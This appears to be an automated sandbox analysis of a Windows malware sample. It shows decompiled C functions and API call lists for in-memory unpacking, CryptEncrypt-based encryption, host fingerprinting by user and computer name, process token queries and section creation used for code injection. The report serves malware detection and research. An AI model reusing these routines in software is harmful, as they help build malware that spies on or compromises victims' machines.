                                                                                                                                                                                                                                                                                    • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00FC361B
                                                                                                                                                                                                                                                                                    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00FC3633
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,038F9630,00000010), ref: 00FC3685
                                                                                                                                                                                                                                                                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,038F9630,00000020,?,?,00000010), ref: 00FC36AE
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000010), ref: 00FC36DD
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00FC370F
                                                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00FC371B
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00FC3723
                                                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00FC3730
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00FC1B16,00000001,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC3738
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3401600162-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 34e3e0fd478efc612cf3cb6a853b7bbfabacb425058b2b3ab17061e0edfa15be
                                                                                                                                                                                                                                                                                    • Instruction ID: 885195cb50c4417d7cb0df4bd06eff21018ac0bd5c37642fc60221118efa7953
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34e3e0fd478efc612cf3cb6a853b7bbfabacb425058b2b3ab17061e0edfa15be
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC515EB290420DBFDB109FA4DE8AEAE7BB8FF44390F108429F515E7250D7749E04AB61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182830756.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
                                                                                                                                                                                                                                                                                    • Instruction ID: 82f0f9cb5b601b9f14a3f147ad8457523407e89c9735378e292c2c65c2a7f156
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5aec10f1a0cb97d920a96a161caf5bd0c1cb3a6df24fb2d88acde02681facd5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D19C766082819FDB50CF54E880B6177AAFF88350B290194ED1DDF35AD7B0A810FBB2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                    			E6E051979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                                                                                                    				L6E052210();
                                                                                                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                                                                    				_t15 =  *0x6e0541d0;
                                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e05505e);
                                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e055054);
                                                                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                                                                    				L6E05220A();
                                                                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t19 = CreateFileMappingW(0xffffffff, 0x6e0541c0, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                                                                    				_t34 = _t19;
                                                                                                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                                    			}















APIs
• GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
• _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
• _snwprintf.NTDLL ref: 6E0519C1
• CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
• MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E051A11
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A29
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A3A

Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp

Similarity
• API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
• String ID:
• API String ID: 1724014008-0
• Opcode ID: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
• Instruction ID: f16992ede6e9b1fa1a308e8e7d2eff0443640e5d4db6832e5b67cda52e88a40c
• Opcode Fuzzy Hash: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A421F2B6500608BFDB02AFE8DE98FDE37BCEB49394F004425F611E7240E6709868CB60
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                    			E00FC3946(char __eax, signed int* __esi) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                                                                                                    				long _t50;
                                                                                                                                                                                                                                                                                    				char _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                                                                    				signed int* _t64;
                                                                                                                                                                                                                                                                                    				char _t65;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                                                    				signed int* _t69;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                                                                                                                                    				_t65 = __eax;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = __eax;
                                                                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                                                                    					_t59 =  *0xfca2c8; // 0xbd092303
                                                                                                                                                                                                                                                                                    					_v12 = _t59;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t64 = _t69;
                                                                                                                                                                                                                                                                                    				E00FC354E( &_v12, _t64);
                                                                                                                                                                                                                                                                                    				if(_t65 != 0) {
                                                                                                                                                                                                                                                                                    					 *_t69 =  *_t69 ^  *0xfca2cc ^ 0x4c0ca0ae;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                                                                    					_t50 = _v8;
                                                                                                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                                                                                                    						_t62 = RtlAllocateHeap( *0xfca290, 0, _t50 + _t50);
                                                                                                                                                                                                                                                                                    						if(_t62 != 0) {
                                                                                                                                                                                                                                                                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    								_t63 = _t62;
                                                                                                                                                                                                                                                                                    								 *_t69 =  *_t69 ^ E00FC3F12(_v8 + _v8, _t63);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							HeapFree( *0xfca290, 0, _t62);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t61 = __imp__;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                                                                    				_t34 = _v8;
                                                                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                                                                    					_t68 = RtlAllocateHeap( *0xfca290, 0, _t34 + _t34);
                                                                                                                                                                                                                                                                                    					if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							_t63 = _t68;
                                                                                                                                                                                                                                                                                    							_t69[3] = _t69[3] ^ E00FC3F12(_v8 + _v8, _t63);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						HeapFree( *0xfca290, 0, _t68);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                                                                                    				_t67 =  &_v28;
                                                                                                                                                                                                                                                                                    				 *_t67 = 1;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                                                                    				 *(_t67 + 8) = _t63;
                                                                                                                                                                                                                                                                                    				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                                                                    				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                                                                    				_t69[1] = _t69[1] ^ _t39;
                                                                                                                                                                                                                                                                                    				return _t39;
                                                                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                                                                    0x00fc3a1c
                                                                                                                                                                                                                                                                                    0x00fc3a1c
                                                                                                                                                                                                                                                                                    0x00fc3a28
                                                                                                                                                                                                                                                                                    0x00fc3a28
                                                                                                                                                                                                                                                                                    0x00fc3a03
                                                                                                                                                                                                                                                                                    0x00fc3a31
                                                                                                                                                                                                                                                                                    0x00fc3a33
                                                                                                                                                                                                                                                                                    0x00fc3a36
                                                                                                                                                                                                                                                                                    0x00fc3a38
                                                                                                                                                                                                                                                                                    0x00fc3a3b
                                                                                                                                                                                                                                                                                    0x00fc3a3e
                                                                                                                                                                                                                                                                                    0x00fc3a48
                                                                                                                                                                                                                                                                                    0x00fc3a4c
                                                                                                                                                                                                                                                                                    0x00fc3a50

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC397D
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00FC2F3F), ref: 00FC3994
                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC39A1
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FC2F3F,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC39C2
                                                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC39E9
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FC39FD
                                                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC3A0A
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 00FC3A28
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4f308fa49c3541904890b3da6df02af60f4394b158edda1798051dd5389206e2
                                                                                                                                                                                                                                                                                    • Instruction ID: 31516a7a494b8bf9d55e4f62a90c0432d15af7a012d56a3cc021fcccb1216647
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f308fa49c3541904890b3da6df02af60f4394b158edda1798051dd5389206e2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF310971A0020AEFDB11DFA9DE86FAEB7F9EB48754F108429E545D3210D771AE04AB10
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                                                                    			E00FC3CA1(char _a4, void* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                                                    				void** _t33;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                                                                                    				void** _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v20 = _a4;
                                                                                                                                                                                                                                                                                    				_t48 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                                                                    				_v44 = 0x18;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                                                                    					_t33 =  &_v8;
                                                                                                                                                                                                                                                                                    					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                                                                    					if(_t33 >= 0) {
                                                                                                                                                                                                                                                                                    						_t47 = __imp__;
                                                                                                                                                                                                                                                                                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                                                                    						_t44 = E00FC5C4E(_a4);
                                                                                                                                                                                                                                                                                    						if(_t44 != 0) {
                                                                                                                                                                                                                                                                                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                                                                    							if(_t40 >= 0) {
                                                                                                                                                                                                                                                                                    								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                                                                    								_t48 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							E00FC2A03(_t44);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						NtClose(_v8); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					NtClose(_v12);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t48;
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00FC3CE8
                                                                                                                                                                                                                                                                                    • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00FC3CFB
                                                                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FC3D17
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FC3D34
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00FC3D41
                                                                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 00FC3D53
                                                                                                                                                                                                                                                                                    • NtClose.NTDLL(00000000), ref: 00FC3D5D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2575439697-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4a56dad192376c8c9797a0deb456fefd994f0796338b3f61d2eebd7d9a7bb824
                                                                                                                                                                                                                                                                                    • Instruction ID: 615ed8d018170fb1264658a0345d86653884d7cd68a2b3c0ea06dcdbaedb4b76
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a56dad192376c8c9797a0deb456fefd994f0796338b3f61d2eebd7d9a7bb824
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 702107B290021DBBDB019F95CD4AEDEBFBDFB08740F104016F901E6120D7B59A44ABA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                                                                    			E6E0518D1(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				int _v40;
                                                                                                                                                                                                                                                                                    				int _v44;
                                                                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t48 = __eax;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v48 = 0x18;
                                                                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = 0x40;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                                                                    				if(_t34 < 0) {
                                                                                                                                                                                                                                                                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					 *_t48 = _v16;
                                                                                                                                                                                                                                                                                    					_t39 = E6E051B89(_t48,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					_t47 = _t39;
                                                                                                                                                                                                                                                                                    					if(_t47 != 0) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                                                                    						 *_a4 = _v12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t47;
                                                                                                                                                                                                                                                                                    			}



















APIs
• NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E
  • Part of subcall function 6E051B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E051943,00000002,00000000,?,?,00000000,?,?,6E051943,00000000), ref: 6E051BB6
• memset.NTDLL ref: 6E051950
Strings
Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
Similarity
• API ID: Section$CreateViewmemset
• String ID: @
• API String ID: 2533685722-2766056989
• Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
• Instruction ID: 4068907e4665e92758692dde8dee57a7983b644cc90d518faf290848c2be52b7
• Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
• Instruction Fuzzy Hash: 3A210BB1D00609EFDB01CFE9C884ADEFBB9EF48354F508429E505F3210D730AA588BA4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
E6E051566(void* __ecx) {
	char _v8;
	signed short _t7;

	_v8 = _v8 & 0x00000000;
	_t7 = GetLocaleInfoA(0x400, 0x5a, &_v8, 4); // executed
	if(_t7 == 0) {
		__imp__GetSystemDefaultUILanguage();
		VerLanguageNameA(_t7 & 0xffff, &_v8, 4);
	}
	return _v8;
}


APIs
• GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E05157B
• GetSystemDefaultUILanguage.KERNEL32(?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051585
• VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E051C5E,?,6E051810,?,00000000,00000000,?,?,?,6E051810), ref: 6E051598
Memory Dump Source
